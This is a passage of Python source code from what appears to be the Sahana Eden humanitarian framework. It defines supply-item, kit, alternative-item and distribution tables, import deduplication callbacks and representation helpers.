title_update = T("Edit Kit Item"),
label_list_button = T("List Kit Items"),
label_delete_button = T("Remove Item from Kit"),
msg_record_created = T("Item added to Kit"),
msg_record_modified = T("Kit Item updated"),
msg_record_deleted = T("Item removed from Kit"),
msg_list_empty = T("No Items currently in this Kit"))
# =====================================================================
# Alternative Items
#
# If the desired item isn't found, then these are designated as
# suitable alternatives
#
tablename = "supply_item_alt"
define_table(tablename,
supply_item_id(notnull=True),
Field("quantity", "double", notnull=True,
default = 1,
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
comment = DIV(_class = "tooltip",
_title = "%s|%s" %
(T("Quantity"),
T("The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item")
)
),
),
supply_item_id("alt_item_id", notnull=True),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Alternative Item"),
title_display = T("Alternative Item Details"),
title_list = T("Alternative Items"),
title_update = T("Edit Alternative Item"),
label_list_button = T("List Alternative Items"),
label_delete_button = T("Delete Alternative Item"),
msg_record_created = T("Alternative Item added"),
msg_record_modified = T("Alternative Item updated"),
msg_record_deleted = T("Alternative Item deleted"),
msg_list_empty = T("No Alternative Items currently registered"))
# =====================================================================
# Item Super-Entity
#
# This super entity provides a common way to provide a foreign key to supply_item
# - it allows searching/reporting across Item types easily.
#
item_types = Storage(asset_asset = T("Asset"),
asset_item = T("Asset Item"),
inv_inv_item = T("Warehouse Stock"),
inv_track_item = T("Order Item"),
proc_plan_item = T("Planned Procurement Item"),
)
tablename = "supply_item_entity"
self.super_entity(tablename, "item_entity_id", item_types,
# @ToDo: Make Items Trackable?
#super_link("track_id", "sit_trackable"),
#location_id(),
supply_item_id(),
item_pack_id(),
Field("quantity", "double", notnull=True,
default = 1.0,
label = T("Quantity"),
),
*s3_ownerstamp())
# Reusable Field
item_id = super_link("item_entity_id", "supply_item_entity",
#writable = True,
#readable = True,
#label = T("Status"),
#represent = item_represent,
# Comment these to use a Dropdown & not an Autocomplete
#widget = S3ItemAutocompleteWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Item"),
# current.messages.AUTOCOMPLETE_HELP))
)
# Filter Widgets
filter_widgets = [
S3TextFilter(name = "item_entity_search_text",
label = T("Search"),
comment = T("Search for an item by text."),
field = ["item_id$name",
#"item_id$item_category_id$name",
#"site_id$name"
]
),
S3OptionsFilter("item_id$item_category_id",
label = T("Code Share"),
comment = T("If none are selected, then all are searched."),
#represent = "%(name)s",
cols = 2,
),
#S3OptionsFilter("country",
# label = current.messages.COUNTRY,
# comment = T("If none are selected, then all are searched."),
# #represent = "%(name)s",
# cols = 2,
# ),
]
# Configuration
configure(tablename,
filter_widgets = filter_widgets,
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(supply_item_id = supply_item_id,
supply_item_entity_id = item_id,
supply_item_category_id = item_category_id,
supply_item_pack_id = item_pack_id,
supply_item_represent = supply_item_represent,
supply_item_category_represent = item_category_represent,
supply_item_pack_quantity = SupplyItemPackQuantity,
supply_item_add = self.supply_item_add,
supply_item_pack_represent = item_pack_represent,
)
# -------------------------------------------------------------------------
@staticmethod
def defaults():
""" Return safe defaults for names in case the model is disabled """
supply_item_id = S3ReusableField("item_id", "integer",
writable=False,
readable=False)
supply_item_category_id = S3ReusableField("item_category_id", "integer",
writable=False,
readable=False)
item_id = S3ReusableField("item_entity_id", "integer",
writable=False,
readable=False)()
item_pack_id = S3ReusableField("item_pack_id", "integer",
writable=False,
readable=False)
return dict(supply_item_id = supply_item_id,
supply_item_category_id = supply_item_category_id,
supply_item_entity_id = item_id,
supply_item_pack_id = item_pack_id,
supply_item_pack_quantity = lambda tablename: lambda row: 0,
)
# -------------------------------------------------------------------------
@staticmethod
def supply_item_category_onvalidate(form):
"""
Checks that either a Code OR a Name are entered
"""
# If there is a tracking number check that it is unique within the org
if not (form.vars.code or form.vars.name):
errors = form.errors
errors.code = errors.name = current.T("An Item Category must have a Code OR a Name.")
# -------------------------------------------------------------------------
@staticmethod
def supply_item_add(quantity_1, pack_quantity_1,
quantity_2, pack_quantity_2):
"""
Adds item quantities together, accounting for different pack
quantities.
Returned quantity according to pack_quantity_1
Used by controllers/inv.py & modules/s3db/inv.py
"""
if pack_quantity_1 == pack_quantity_2:
# Faster calculation
quantity = quantity_1 + quantity_2
else:
quantity = ((quantity_1 * pack_quantity_1) +
(quantity_2 * pack_quantity_2)) / pack_quantity_1
return quantity
# -------------------------------------------------------------------------
@staticmethod
def item_represent(id):
"""
Represent an item entity in option fields or list views
- unused, we use VirtualField instead
@ToDo: Migrate to S3Represent
"""
if not id:
return current.messages["NONE"]
db = current.db
if isinstance(id, Row) and "instance_type" in id:
# Do not repeat the lookup if already done by IS_ONE_OF
item = id
instance_type = item.instance_type
else:
item_table = db.supply_item_entity
item = db(item_table._id == id).select(item_table.instance_type,
limitby=(0, 1)).first()
try:
instance_type = item.instance_type
except:
return current.messages.UNKNOWN_OPT
T = current.T
if instance_type == "inv_inv_item":
item_str = T("In Stock")
elif instance_type == "inv_track_item":
s3db = current.s3db
itable = s3db[instance_type]
rtable = s3db.inv_recv
query = (itable.item_entity_id == id) & \
(rtable.id == itable.recv_id)
eta = db(query).select(rtable.eta,
limitby=(0, 1)).first().eta
item_str = T("Due %(date)s") % dict(date=eta)
else:
return current.messages.UNKNOWN_OPT
return item_str
# -------------------------------------------------------------------------
@staticmethod
def supply_item_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
code = data.get("code")
if code:
# Same Code => definitely duplicate
table = item.table
query = (table.deleted != True) & \
(table.code.lower() == code.lower())
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
else:
name = data.get("name")
if not name:
# No way to match
return
um = data.get("um")
if not um:
# Try to extract UM from Name
name, um = item_um_from_name(name)
table = item.table
query = (table.deleted != True) & \
(table.name.lower() == name.lower())
if um:
query &= (table.um.lower() == um.lower())
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_category_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
name = data.get("name")
if name:
query &= (table.name.lower() == name.lower())
code = data.get("code")
if code:
query &= (table.code.lower() == code.lower())
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
parent_category_id = data.get("parent_category_id")
if parent_category_id:
query &= (table.parent_category_id == parent_category_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_catalog_item_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
item_id = data.get("item_id")
if item_id:
query &= (table.item_id == item_id)
catalog_id = data.get("catalog_id")
if catalog_id:
query &= (table.catalog_id == catalog_id)
item_category_id = data.get("item_category_id")
if item_category_id:
query &= (table.item_category_id == item_category_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_pack_duplicate(item):
"""
Callback function used to look for duplicates during
the import process
@param item: the S3ImportItem to check
"""
data = item.data
table = item.table
query = (table.deleted != True)
name = data.get("name")
if name:
query &= (table.name.lower() == name.lower())
item_id = data.get("item_id")
if item_id:
query &= (table.item_id == item_id)
quantity = data.get("quantity")
if quantity:
query &= (table.quantity == quantity)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# -------------------------------------------------------------------------
@staticmethod
def supply_item_onaccept(form):
"""
Create a catalog_item for this item
Update the UM (Unit of Measure) in the supply_item_pack table
"""
db = current.db
vars = form.vars
item_id = vars.id
catalog_id = vars.catalog_id
catalog_item_id = None
citable = db.supply_catalog_item
query = (citable.item_id == item_id) & \
(citable.deleted == False )
rows = db(citable).select(citable.id)
if not len(rows):
# Create supply_catalog_item
catalog_item_id = \
citable.insert(catalog_id = catalog_id,
item_category_id = vars.item_category_id,
item_id = item_id
)
# Update if the catalog/category has changed - if there is only supply_catalog_item
elif len(rows) == 1:
catalog_item_id = rows.first().id
catalog_item_id = \
db(citable.id == catalog_item_id
).update(catalog_id = catalog_id,
item_category_id = vars.item_category_id,
item_id = item_id
)
#current.auth.s3_set_record_owner(citable, catalog_item_id, force_update=True)
# Update UM
um = vars.um or db.supply_item.um.default
table = db.supply_item_pack
# Try to update the existing record
query = (table.item_id == item_id) & \
(table.quantity == 1) & \
(table.deleted == False)
if db(query).update(name = um) == 0:
# Create a new item packet
table.insert(item_id = item_id,
name = um,
quantity = 1)
if vars.kit:
# Go to that tab afterwards
url = URL(args=["[id]", "kit_item"])
current.s3db.configure("supply_item",
create_next=url,
update_next=url,
)
# =============================================================================
class S3SupplyDistributionModel(S3Model):
"""
Supply Distribution Model
- depends on Stats module
A Distribution is an Item (which could be a Kit) distributed to a single Location
- usually as part of an Activity
"""
names = ("supply_distribution_item",
"supply_distribution",
)
def model(self):
settings = current.deployment_settings
if not settings.has_module("stats"):
# Distribution Model needs Stats module enabling
return {}
T = current.T
db = current.db
s3 = current.response.s3
configure = self.configure
crud_strings = s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Distribution Item: supply items which can be distributed
#
tablename = "supply_distribution_item"
define_table(tablename,
super_link("parameter_id", "stats_parameter"),
self.supply_item_entity_id,
self.supply_item_id(ondelete = "RESTRICT",
required = True,
),
# @ToDo: Hide this field & populate onaccept from the item_id represent
Field("name", length=128, unique=True,
#label = T("Distribution Item Name"),
label = T("Label"),
requires = IS_NOT_IN_DB(db,
"supply_distribution_item.name",
),
),
*s3_meta_fields())
# CRUD Strings
ADD_ITEM = T("Add Distribution Item")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM,
title_display = T("Distribution Item"),
title_list = T("Distribution Items"),
title_update = T("Edit Distribution Item"),
label_list_button = T("List Distribution Items"),
msg_record_created = T("Distribution Item Added"),
msg_record_modified = T("Distribution Item Updated"),
msg_record_deleted = T("Distribution Item Deleted"),
msg_list_empty = T("No Distribution Items Found")
)
# Resource Configuration
configure(tablename,
onaccept = self.supply_distribution_item_onaccept,
super_entity = ("stats_parameter", "supply_item_entity"),
)
# ---------------------------------------------------------------------
# Distribution: actual distribution of a supply item
#
tablename = "supply_distribution"
define_table(tablename,
# Instance
super_link("data_id", "stats_data"),
# Component (each Distribution can link to a single Project)
#self.project_project_id(),
# Component (each Distribution can link to a single Activity)
self.project_activity_id(),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Item"),
instance_types = ("supply_distribution_item",),
represent = S3Represent(lookup="stats_parameter"),
readable = True,
writable = True,
empty = False,
comment = S3PopupLink(c = "supply",
f = "distribution_item",
vars = {"prefix": "supply",
"child": "parameter_id"},
title=ADD_ITEM,
),
),
self.gis_location_id(),
Field("value", "integer",
label = T("Quantity"),
requires = IS_INT_IN_RANGE(0, None),
represent = lambda v: \
IS_INT_AMOUNT.represent(v),
),
s3_date("date",
#empty = False,
label = T("Start Date"),
),
s3_date("end_date",
#empty = False,
label = T("End Date"),
start_field = "supply_distribution_date",
default_interval = 12,
),
#self.stats_source_id(),
Field.Method("year", self.supply_distribution_year),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_DIST = T("Add Distribution")
crud_strings[tablename] = Storage(
label_create = ADD_DIST,
title_display = T("Distribution Details"),
title_list = T("Distributions"),
title_update = T("Edit Distribution"),
title_report = T("Distribution Report"),
label_list_button = T("List Distributions"),
msg_record_created = T("Distribution Added"),
msg_record_modified = T("Distribution Updated"),
msg_record_deleted = T("Distribution Deleted"),
msg_list_empty = T("No Distributions Found")
)
# Reusable Field
#represent = S3Represent(lookup=tablename,
# field_sep = " ",
# fields=["value", "parameter_id"])
# Resource Configuration
# ---------------------------------------------------------------------
def year_options():
"""
returns a dict of the options for the year virtual field
used by the search widget
orderby needed for postgres
"""
table = db.supply_distribution
query = (table.deleted == False)
min_field = table.date.min()
date_min = db(query).select(min_field,
orderby=min_field,
limitby=(0, 1)
).first()
start_year = date_min and date_min[min_field].year
max_field = table.date.max()
date_max = db(query).select(max_field,
orderby=max_field,
limitby=(0, 1)
).first()
last_start_year = date_max and date_max[max_field].year
max_field = table.end_date.max()
date_max = db(query).select(max_field,
orderby=max_field,
limitby=(0, 1)
).first()
last_end_year = date_max and date_max[max_field].year
end_year = max(last_start_year, last_end_year)
if not start_year or not end_year:
return {start_year:start_year} or {end_year:end_year}
years = {}
for year in xrange(start_year, end_year + 1):
years[year] = year
return years
# Which levels of Hierarchy are we using?
levels = current.gis.get_relevant_hierarchy_levels()
# Normally only used in Report
filter_widgets = [
#S3TextFilter([#"item_id$name",
# if settings.get_project_projects():
# "activity_id$project_id$name",
# "activity_id$project_id$code",
# "location_id",
# "comments"
# ],
# label = T("Search Distributions"),
# ),
S3LocationFilter("location_id",
levels=levels,
widget="multiselect"
),
S3OptionsFilter("activity_id$activity_organisation.organisation_id",
widget="multiselect"
),
S3OptionsFilter("parameter_id",
label = T("Item"),
widget="multiselect"
),
# @ToDo: Range Slider using start_date & end_date
#S3DateFilter("date",
# )
# @ToDo: OptionsFilter working with Lazy VF
#S3OptionsFilter("year",
# label=T("Year"),
# options = year_options,
# widget="multiselect",
# hidden=True,
# ),
]
list_fields = ["activity_id$activity_organisation.organisation_id",
(T("Item"), "parameter_id"),
"value",
(T("Year"), "year"),
]
report_fields = ["activity_id$activity_organisation.organisation_id",
(T("Item"), "parameter_id"),
"parameter_id",
(T("Year"), "year"),
]
if settings.get_project_sectors():
report_fields.append("activity_id$sector_activity.sector_id")
filter_widgets.insert(0,
S3OptionsFilter("activity_id$sector_activity.sector_id",
# Doesn't allow translation
#represent="%(name)s",
widget="multiselect",
#hidden=True,
))
if settings.get_project_hazards():
report_fields.append("activity_id$project_id$hazard.name")
if settings.get_project_projects():
list_fields.insert(0, "activity_id$project_id")
report_fields.append("activity_id$project_id")
filter_widgets.append(
S3OptionsFilter("activity_id$project_id",
widget="multiselect"
),
#S3OptionsFilter("activity_id$project_id$organisation_id",
# label = T("Lead Organization"),
# widget="multiselect"
# ),
#S3OptionsFilter("activity_id$project_id$partner.organisation_id",
# label = T("Partners"),
# widget="multiselect"),
#S3OptionsFilter("activity_id$project_id$donor.organisation_id",
# label = T("Donors"),
# location_level="L1",
# widget="multiselect")
)
if settings.get_project_themes():
report_fields.append("activity_id$project_id$theme.name")
filter_widgets.append(
S3OptionsFilter("activity_id$project_id$theme_project.theme_id",
# Doesn't allow translation
#represent="%(name)s",
widget="multiselect",
#hidden=True,
))
for level in levels:
lfield = "location_id$%s" % level
list_fields.append(lfield)
report_fields.append(lfield)
if "L0" in levels:
default_row = "location_id$L0"
elif "L1" in levels:
default_row = "location_id$L1"
else:
default_row = "activity_id$activity_organisation.organisation_id"
report_options = Storage(rows = report_fields,
cols = report_fields,
fact = [(T("Number of Items"), "sum(value)"),
],
defaults = Storage(rows = default_row,
cols = "parameter_id",
fact = "sum(value)",
totals = True,
),
# Needed for Virtual Field
extra_fields = ["date",
"end_date",
]
)
configure(tablename,
context = {"location": "location_id",
"organisation": "activity_id$organisation_activity.organisation_id",
},
deduplicate = S3Duplicate(primary = ("activity_id",
"location_id",
"parameter_id",
),
),
filter_widgets = filter_widgets,
onaccept = self.supply_distribution_onaccept,
report_options = report_options,
super_entity = "stats_data",
)
# Pass names back to global scope (s3.*)
return {}
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_item_onaccept(form):
"""
Update supply_distribution_item name from supply_item_id
"""
db = current.db
dtable = db.supply_distribution_item
ltable = db.supply_item
record_id = form.vars.id
query = (dtable.id == record_id) & \
(ltable.id == dtable.item_id)
item = db(query).select(dtable.name,
ltable.name,
limitby=(0, 1)).first()
if item and not item[dtable.name]:
db(dtable.id == record_id).update(name = item[ltable.name])
return
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_onaccept(form):
"""
Set supply_distribution location, start_date and end_date
from activity
This is for when the data is created after the project_activity
- CSV imports into project_activity
- Inline forms in project_activity
"""
db = current.db
dtable = db.supply_distribution
record_id = form.vars.id
# Get the full record
record = db(dtable.id == record_id).select(dtable.activity_id,
dtable.location_id,
dtable.date,
dtable.end_date,
limitby=(0, 1)
).first()
try:
location_id = record.location_id
start_date = record.date
end_date = record.end_date
except:
# Exit Gracefully
current.log.warning("Cannot find Distribution: %s" % record_id)
return
activity_id = record.activity_id
if not activity_id:
# Nothing we can do
return
# Read Activity
atable = db.project_activity
activity = db(atable.id == activity_id).select(atable.location_id,
atable.date,
atable.end_date,
limitby=(0, 1)
).first()
try:
a_location_id = activity.location_id
a_start_date = activity.date
a_end_date = activity.end_date
except:
# Exit Gracefully
current.log.warning("Cannot find Activity: %s" % activity_id)
return
data = {}
if a_location_id and a_location_id != location_id:
data["location_id"] = a_location_id
if a_start_date and a_start_date != start_date:
data["date"] = a_start_date
if a_end_date and a_end_date != end_date:
data["end_date"] = a_end_date
if data:
# Update Distribution details
db(dtable.id == record_id).update(**data)
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_year(row):
""" Virtual field for the supply_distribution table """
if hasattr(row, "supply_distribution"):
row = row.supply_distribution
try:
date = row.date
except AttributeError:
date = None
try:
end_date = row.end_date
except AttributeError:
end_date = None
if not date and not end_date:
return []
elif not end_date:
return [date.year]
elif not date:
return [end_date.year]
else:
return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class supply_ItemRepresent(S3Represent):
""" Representation of Supply Items """
def __init__(self,
translate=False,
show_link=False,
show_um=False,
multiple=False):
self.show_um = show_um
# Need a custom lookup to join with Brand
self.lookup_rows = self.custom_lookup_rows
fields = ["supply_item.id",
"supply_item.name",
"supply_item.model",
"supply_brand.name",
]
if show_um:
fields.append("supply_item.um")
super(supply_ItemRepresent,
self).__init__(lookup="supply_item",
fields=fields,
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item rows, does a
left join with the brand. Parameters
key and fields are not used, but are kept for API
compatibility reasons.
@param values: the supply_item IDs
"""
db = current.db
itable = current.s3db.supply_item
btable = db.supply_brand
left = btable.on(btable.id == itable.brand_id)
qty = len(values)
if qty == 1:
query = (itable.id == values[0])
limitby = (0, 1)
else:
query = (itable.id.belongs(values))
limitby = (0, qty)
rows = db(query).select(*self.fields,
left=left,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the supply_item Row
"""
name = row["supply_item.name"]
model = row["supply_item.model"]
brand = row["supply_brand.name"]
fields = []
if name:
fields.append(name)
if model:
fields.append(model)
if brand:
fields.append(brand)
name = " - ".join(fields)
if self.show_um:
um = row["supply_item.um"]
if um:
name = "%s (%s)" % (name, um)
return s3_str(name)
# =============================================================================
class supply_ItemPackRepresent(S3Represent):
""" Representation of Supply Item Packs """
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item_pack rows, does a left join with
the item.
@param key: the primary key of the lookup table
@param values: the supply_item_pack IDs
@param fields: the fields to lookup (unused in this class,
retained for API compatibility)
"""
db = current.db
table = self.table
itable = db.supply_item
qty = len(values)
if qty == 1:
query = (key == values[0])
else:
query = (key.belongs(values))
left = itable.on(table.item_id == itable.id)
rows = db(query).select(table.id,
table.name,
table.quantity,
itable.um,
left=left,
limitby=(0, qty),
)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the Row (usually joined supply_item_pack/supply_item)
@todo: implement translate option
"""
try:
item = row.supply_item
pack = row.supply_item_pack
except AttributeError:
# Missing join (external query?)
item = {"um": "Piece"}
pack = row
name = pack.get("name")
if not name:
return current.messages.UNKNOWN_OPT
quantity = pack.get("quantity")
if quantity == 1 or quantity is None:
return name
else:
# Include pack description (quantity x units of measurement)
return "%s (%s x %s)" % (name, quantity, item.get("um"))
# =============================================================================
class supply_ItemCategoryRepresent(S3Represent):
""" Representation of Supply Item Categories """
def __init__(self,
translate=False,
show_link=False,
use_code=True,
multiple=False):
self.use_code = use_code
# Need a custom lookup to join with Parent/Catalog
self.lookup_rows = self.custom_lookup_rows
fields = ["supply_item_category.id",
"supply_item_category.name",
# Always-included since used as fallback if no name
"supply_item_category.code",
"supply_catalog.name",
"supply_parent_item_category.name",
"supply_grandparent_item_category.name",
"supply_grandparent_item_category.parent_item_category_id",
]
super(supply_ItemCategoryRepresent,
self).__init__(lookup="supply_item_category",
fields=fields,
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item category rows, does a
left join with the parent category. Parameters
key and fields are not used, but are kept for API
compatibility reasons.
@param values: the supply_item_category IDs
"""
db = current.db
table = current.s3db.supply_item_category
ctable = db.supply_catalog
ptable = db.supply_item_category.with_alias("supply_parent_item_category")
gtable = db.supply_item_category.with_alias("supply_grandparent_item_category")
left = [ctable.on(ctable.id == table.catalog_id),
ptable.on(ptable.id == table.parent_item_category_id),
gtable.on(gtable.id == ptable.parent_item_category_id),
]
qty = len(values)
if qty == 1:
query = (table.id == values[0])
limitby = (0, 1)
else:
query = (table.id.belongs(values))
limitby = (0, qty)
rows = db(query).select(*self.fields,
left=left,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the supply_item_category Row
"""
use_code = self.use_code
name = row["supply_item_category.name"]
code = row["supply_item_category.code"]
catalog = row["supply_catalog.name"]
parent = row["supply_parent_item_category.name"]
if use_code:
name = code
elif not name:
name = code
if parent:
if use_code:
# Compact format
sep = "-"
else:
sep = " - "
name = "%s%s%s" % (name, sep, parent)
grandparent = row["supply_grandparent_item_category.name"]
if grandparent:
name = "%s%s%s" % (name, sep, grandparent)
# Check for Great-grandparent
# Trade-off "all in 1 row" vs "too many joins"
greatgrandparent = row["supply_grandparent_item_category.parent_item_category_id"]
if greatgrandparent:
# Assume no more than 6 levels of interest
db = current.db
table = current.s3db.supply_item_category
ptable = db.supply_item_category.with_alias("supply_parent_item_category")
gtable = db.supply_item_category.with_alias("supply_grandparent_item_category")
left = [ptable.on(ptable.id == table.parent_item_category_id),
gtable.on(gtable.id == ptable.parent_item_category_id),
]
query = (table.id == greatgrandparent)
fields = [table.name,
table.code,
ptable.name,
ptable.code,
gtable.name,
gtable.code,
]
row = db(query).select(*fields,
left=left,
limitby=(0, 1)).first()
if row:
if use_code:
greatgrandparent = row["supply_item_category.code"]
greatgreatgrandparent = row["supply_parent_item_category.code"]
else:
greatgrandparent = row["supply_item_category.name"] or row["supply_item_category.code"]
greatgreatgrandparent = row["supply_parent_item_category.name"] or row["supply_parent_item_category.code"]
name = "%s%s%s" % (name, sep, greatgrandparent)
if greatgreatgrandparent:
name = "%s%s%s" % (name, sep, greatgreatgrandparent)
if use_code:
greatgreatgreatgrandparent = row["supply_grandparent_item_category.code"]
else:
greatgreatgreatgrandparent = row["supply_grandparent_item_category.name"] or row["supply_grandparent_item_category.code"]
if greatgreatgreatgrandparent:
name = "%s%s%s" % (name, sep, greatgreatgreatgrandparent)
if catalog:
name = "%s > %s" % (catalog, name)
return s3_str(name)
# =============================================================================
def item_um_from_name(name):
"""
Retrieve the Unit of Measure from a name
"""
for um_pattern in um_patterns:
m = re.search(um_pattern, name)
if m:
um = m.group(1).strip()
# Rename name from um
name = re.sub(um_pattern, "", name)
# Remove trailing , & wh sp
name = re.sub("(,)$", "", name).strip()
return (name, um)
return (name, None)
# =============================================================================
def supply_catalog_rheader(r):
""" Resource Header for Catalogs """
if r.representation == "html":
catalog = r.record
if catalog:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Categories"), "item_category"),
(T("Items"), "catalog_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % table.name.label),
catalog.name,
),
TR(TH("%s: " % table.organisation_id.label),
table.organisation_id.represent(catalog.organisation_id),
),
),
rheader_tabs
)
return rheader
return None
# =============================================================================
def supply_item_rheader(r):
""" Resource Header for Items """
if r.representation == "html":
item = r.record
if item:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Packs"), "item_pack"),
(T("Alternative Items"), "item_alt"),
(T("In Inventories"), "inv_item"),
(T("Requested"), "req_item"),
(T("In Catalogs"), "catalog_item"),
]
if item.kit == True:
tabs.append((T("Kit Items"), "kit_item"))
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR( TH("%s: " % table.name.label),
item.name,
),
TR( TH("%s: " % table.brand_id.label),
table.brand_id.represent(item.brand_id),
),
TR( TH("%s: " % table.model.label),
item.model or current.messages["NONE"],
),
),
rheader_tabs
)
return rheader
return None
# =============================================================================
class SupplyItemPackQuantity(object):
""" Virtual Field for pack_quantity """
def __init__(self, tablename):
self.tablename = tablename
def __call__(self, row):
default = 0
tablename = self.tablename
if hasattr(row, tablename):
row = object.__getattribute__(row, tablename)
try:
item_pack_id = row.item_pack_id
except AttributeError:
return default
if item_pack_id:
return item_pack_id.quantity
else:
return default
# =============================================================================
def supply_item_entity_category(row):
""" Virtual field: category """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
try:
item_id = row.item_id
except AttributeError:
return None
table = current.s3db.supply_item
query = (table.id == item_id)
record = current.db(query).select(table.item_category_id,
limitby=(0, 1)).first()
if record:
return table.item_category_id.represent(record.item_category_id)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_country(row):
""" Virtual field: country """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
ltable = s3db.gis_location
if instance_type == "inv_inv_item":
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(stable.site_id == itable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id) & \
(stable.site_id == rtable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
ptable = s3db.proc_plan
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(ptable.id == itable.plan_id) & \
(stable.site_id == ptable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
if record:
return record.L0 or current.T("Unknown")
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_organisation(row):
""" Virtual field: organisation """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
organisation_represent = s3db.org_OrganisationRepresent(acronym=False)
itable = s3db[instance_type]
if instance_type == "inv_inv_item":
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(stable.site_id == itable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
rtable = s3db.proc_plan
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.plan_id) & \
(stable.site_id == rtable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id) & \
(stable.site_id == rtable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
if record:
return organisation_represent(record.organisation_id)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_contacts(row):
""" Virtual field: contacts (site_id) """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
db = current.db
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
if instance_type == "inv_inv_item":
query = (itable[ekey] == entity_id)
record = db(query).select(itable.site_id,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id)
record = db(query).select(rtable.site_id,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
ptable = s3db.proc_plan
query = (itable[ekey] == entity_id) & \
(ptable.id == itable.plan_id)
record = db(query).select(ptable.site_id,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
default = current.messages["NONE"]
if not record:
return default
otable = s3db.org_office
query = (otable.site_id == record.site_id)
